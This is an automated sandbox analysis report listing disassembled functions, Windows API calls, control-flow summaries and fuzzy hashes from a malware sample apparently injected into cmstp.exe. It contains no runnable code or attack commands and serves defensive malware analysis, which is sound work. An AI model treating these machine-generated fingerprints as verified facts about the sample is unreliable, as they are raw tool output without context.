                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01EBFED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000A9037 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 243 a9037-a903b 244 a902c-a9035 243->244 245 a903d-a9082 call abd00 243->245 251 a9088-a90d8 call abdd0 call 9ace0 call a4e40 245->251 252 a915c-a9162 245->252 259 a90e0-a90f1 Sleep 251->259 260 a90f3-a90f9 259->260 261 a9156-a915a 259->261 262 a90fb-a9121 call a8c60 260->262 263 a9123-a9143 260->263 261->252 261->259 264 a9149-a914c 262->264 263->264 265 a9144 call a8e70 263->265 264->261 265->264
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 000A90E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 89d20f141097f912962c12f6c67f8e4e13333a788c201945565a7f0af1276ce3
                                          • Instruction ID: 5a19540ad1347d85e0205fc19009737b9f09d8c76c480406e1d6047dbd75f9ff
                                          • Opcode Fuzzy Hash: 89d20f141097f912962c12f6c67f8e4e13333a788c201945565a7f0af1276ce3
                                          • Instruction Fuzzy Hash: 4931B4B2600205AFCB24DFA8D885FABB7F8FB89700F108169EA1D5B246D771A550CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000A9040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 268 a9040-a9082 call abd00 271 a9088-a90d8 call abdd0 call 9ace0 call a4e40 268->271 272 a915c-a9162 268->272 279 a90e0-a90f1 Sleep 271->279 280 a90f3-a90f9 279->280 281 a9156-a915a 279->281 282 a90fb-a9121 call a8c60 280->282 283 a9123-a9143 280->283 281->272 281->279 284 a9149-a914c 282->284 283->284 285 a9144 call a8e70 283->285 284->281 285->284
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 000A90E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 1a71e6dc4dff4f472559d6feda0db4d663c70a74246b6585649c3cc6ab04cd34
                                          • Instruction ID: e547275dea6c71c025aca6996a32ac14f5f7b4fb6bd0223c8fc1a748b1492dca
                                          • Opcode Fuzzy Hash: 1a71e6dc4dff4f472559d6feda0db4d663c70a74246b6585649c3cc6ab04cd34
                                          • Instruction Fuzzy Hash: 313181B6600745BBC724DFA4C885FA7B7F8BB89B01F10841DF62A5B246DB70A550CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 300 aa5f0-aa621 call aaf20 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(&E,?,000A4C9F,000A4C9F,?,000A4526,?,?,?,?,?,00000000,00000000,?), ref: 000AA61D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: &E
                                          • API String ID: 1279760036-2925179166
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: 4ac05c39e2d3972d2d70cc473dc600fabf2bfdd42aefaf4d98bcbb78c6f2878c
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: 20E012B2200208ABDB18EF99DC41EE777ACAF88654F118558BA085B282C630F914CAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 303 aa630-aa661 call aaf20 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA65D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: 5e5836bea2ede1412439be4b8e1d8a618688e6f4e511855f0301eaa5aec8da97
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: 40E01AB12002046BD718DF99DC45EE777ACAF88750F014554B90857242D630E914CAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00098308 Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 312 98308-9835a call abe20 call ac9c0 call 9ace0 call a4e40 321 9835c-9836e PostThreadMessageW 312->321 322 9838e-98392 312->322 324 9838d 321->324 325 98370-9838b call 9a470 PostThreadMessageW 321->325 324->322 325->324
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 25d073b2bc6f21cadc9bcad80a3e92cefb8248710b66ae470d3de3b195a8fe42
                                          • Instruction ID: b1415845bb2c15092ea0df81228b55cb16e75bf82f839d937fcd01a33f143d54
                                          • Opcode Fuzzy Hash: 25d073b2bc6f21cadc9bcad80a3e92cefb8248710b66ae470d3de3b195a8fe42
                                          • Instruction Fuzzy Hash: 45018871A8031877EB20A6949C43FFE776C6F41B50F054114FF04BA2C2E7E46A0547E6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00098310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 328 98310-9831f 329 98328-9835a call ac9c0 call 9ace0 call a4e40 328->329 330 98323 call abe20 328->330 337 9835c-9836e PostThreadMessageW 329->337 338 9838e-98392 329->338 330->329 340 9838d 337->340 341 98370-9838b call 9a470 PostThreadMessageW 337->341 340->338 341->340
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                          • Instruction ID: ced5e8d80e33feea0380355814cacd8b7b87fbc68f25bb1e9ce4e5a58f50b5ff
                                          • Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                          • Instruction Fuzzy Hash: 1F01A771A8022877EB20A6949C03FFE776C6B41F50F054114FF04BA1C2E6D46A0547F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000982D6 Relevance: 3.0, APIs: 2, Instructions: 41threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 344 982d6-982d8 345 982da-982de 344->345 346 982a4-982a5 344->346 347 9835b-9835e 345->347 348 982e0-982ee call ab860 345->348 349 9836c-9836e 347->349 350 98360-9836a PostThreadMessageW 347->350 357 982f5-982fd 348->357 358 982f0 call ab710 348->358 352 9838d-98392 349->352 353 98370-9838b call 9a470 PostThreadMessageW 349->353 350->349 353->352 358->357
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: eae49a7148fe1e165b79ccdbb62363430c888ffdd4d21c8bb6139d46b6fe1dc1
                                          • Instruction ID: 5c7e013320298cd257ce70b840aa71ee39944a5494ea674db24a0f8256618ef2
                                          • Opcode Fuzzy Hash: eae49a7148fe1e165b79ccdbb62363430c888ffdd4d21c8bb6139d46b6fe1dc1
                                          • Instruction Fuzzy Hash: 5BF0277164011875DE2166B47C43FFE37489B83B45F0440A6FA49952C3EE864506A7F2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0009ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009AD52
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                          • Instruction ID: e759d1ebc43adca8ab2bcd6ee8611188b1765da8f0512a70fb161b4bd04106d2
                                          • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                          • Instruction Fuzzy Hash: 0A015EB5E0020DABDF10DAE0DC42FDDB3B89B15308F004195E90997642F630EB04CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA6F4
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 4736f0b901c09da98cead05548fa36866934e4090c25d5a030b79a285019f6d6
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: 4601AFB2210108AFCB58DF89DC80EEB77ADAF8C754F158258BA0D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA69D Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA6F4
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 3f602a1de7397e4b39fd9def6ee00587ac66b6f39343a89adf6c669d95ccb561
                                          • Instruction ID: b807298679bdef8f3f2b1faf78010be4e52b1c752b70c0e6fc9f444fd8fa1880
                                          • Opcode Fuzzy Hash: 3f602a1de7397e4b39fd9def6ee00587ac66b6f39343a89adf6c669d95ccb561
                                          • Instruction Fuzzy Hash: BD01AFB2210108AFCB58DF89DC80EEB77A9AF8C354F158258FA0D97241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000A9170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F040,?,?,00000000), ref: 000A91AC
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                          • Instruction ID: 4b357aa5662d51e8b08a3a73ebfad1f1252f5175dbb216f847bc9a74b59d2f46
                                          • Opcode Fuzzy Hash: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                          • Instruction Fuzzy Hash: 19E06D373902043AE22065D9AC02FE7B39C9B92B20F140026FA0DEB2C2D595F80142A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000A9164 Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F040,?,?,00000000), ref: 000A91AC
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 8fe1a86a96aa36e029cb02f030156ca52b199ed427dbc6eb8e437db604b5800c
                                          • Instruction ID: 33b4d906a3e759faa1b71359f9623ad3d30265a0792490207d82a24e081923a0
                                          • Opcode Fuzzy Hash: 8fe1a86a96aa36e029cb02f030156ca52b199ed427dbc6eb8e437db604b5800c
                                          • Instruction Fuzzy Hash: 85F0223639170036D231A5A88C03FA736998B92B10F180069FE09BB2C2D596F80286A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F1C2,0009F1C2,?,00000000,?,?), ref: 000AA7C0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: bd311862f062f3c19c5c75eb2969059cfca6b4831b906fc7121fa62b9488e6e0
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 75E01AB12002086BDB14DF89DC85EE737ADAF89650F018164BA0857242DA30E8148BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0009F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00098D14,?), ref: 0009F6EB
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                          • Instruction ID: 9c0c29b9252940e65a6d529bfd1b0fa08b361b13211a4bcd829452c380ab0fde
                                          • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                          • Instruction Fuzzy Hash: 6DD0A7767503043BEA10FAE49C03F6633CC6B45B00F490074F948D73C3D954F4004165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 01EE8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Kernel-MUI-Language-Allowed, xrefs: 01EE8827
                                          • WindowsExcludedProcs, xrefs: 01EE87C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 01EE8914
                                          • Kernel-MUI-Language-SKU, xrefs: 01EE89FC
                                          • Kernel-MUI-Number-Allowed, xrefs: 01EE87E6
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: f9df061cff09e6457bff6635363db199dab5fd49739ef507b24befd364c60947
                                          • Instruction ID: a0f5be6b28e85195b8e95d3d624f143d5c3c81755f82805808aaedcedd336ae4
                                          • Opcode Fuzzy Hash: f9df061cff09e6457bff6635363db199dab5fd49739ef507b24befd364c60947
                                          • Instruction Fuzzy Hash: 74F1F4B2D0024AEFDF11DF98C984DEEBBF9FB08704F14546AE605A7210E7359A45DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01F5822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: _wcsnlen
                                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                          • API String ID: 3628947076-1387797911
                                          • Opcode ID: c8f8678df08720f1f65c7b324fe25f1ecc974d95e1c074392d2c820684e997f4
                                          • Instruction ID: 4e886d1908697c34acb00539accf92608b42664ef8a8d6416b82b0c6d6af3297
                                          • Opcode Fuzzy Hash: c8f8678df08720f1f65c7b324fe25f1ecc974d95e1c074392d2c820684e997f4
                                          • Instruction Fuzzy Hash: 5E41957624120ABAE7419A92CD81FEFBB6CAF047D4F100116BF04D6161D7B3DB509BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01F013CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 1bd56f2a8915a6c0f3d38d24c1f859b6df06a8e5771b2520189ff8c78651fd65
                                          • Instruction ID: 61b7411cf61414cc3c42ddff9974cb23f3aa1c35eb7363f0c02afab93d02142d
                                          • Opcode Fuzzy Hash: 1bd56f2a8915a6c0f3d38d24c1f859b6df06a8e5771b2520189ff8c78651fd65
                                          • Instruction Fuzzy Hash: AF6135B5E04656EACB36CF5DC8808BFBBB5EF95300754C12EE59647581D332E640DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01F63B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
